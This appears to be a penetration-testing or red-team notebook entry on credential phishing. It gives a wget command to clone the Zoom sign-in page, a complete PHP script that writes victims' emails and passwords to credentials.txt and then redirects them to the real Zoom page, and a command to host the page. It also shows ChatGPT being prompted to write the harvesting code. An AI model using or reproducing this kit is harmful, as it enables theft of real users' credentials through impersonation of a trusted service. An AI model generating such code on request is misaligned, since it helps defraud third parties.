x

Hands-On Credential Phishing

https://hacktricks.boitatech.com.br/phishing-methodology
SMTP (25,465,587)

13.3.2 - Cloning a legitimate website

Clone the page of a website with wget 

wget -E -k -K -p -e robots=off -H -Dzoom.us -nd "https://zoom.us/signin#/login"

Make sure the cookie modal is present, use ChatGPT to adjust any spacing issues

13.3.4 - Injecting malicious elements into the clone

Start by asking ChatGPT for a custom login file 

Help me write the custom_login.php file, it should first capture the email and password and then write them to a file called "credentials.txt" without overwriting an existing file or its content. 

After it should redirect the user to the official zoom page  https://zoom.us/signin#/login

Should spit out something similar to this, dumping the creds into a file called credentials.txt 

<?php
// Check if the form fields 'email' and 'password' are set
if (isset($_POST['email']) && isset($_POST['password'])) {
    // Get the email and password from the form
    $email = $_POST['email'];
    $password = $_POST['password'];

    // Define the file path to store the credentials
    $file = 'credentials.txt';

    // Prepare the data to write (append mode)
    $data = "Email: " . $email . "\nPassword: " . $password . "\n\n";

    // Use file_put_contents to write to the file and create it if it doesn’t exist
    if (file_put_contents($file, $data, FILE_APPEND | LOCK_EX) === false) {
        echo "Error writing to file.";
        exit();
    }

    // Redirect the user to the official Zoom sign in page
    header('Location: https://zoom.us/signin#/login');
    exit();
} else {
    // If the form is not submitted correctly, output an error message
    echo "Please ensure both email and password are provided.";
}
?>

Host the application on an http.server and check for outputted credentials in the txt file 

python3 -m http.server 80
Left-click: follow link, Right-click: select node, Scroll: zoom
x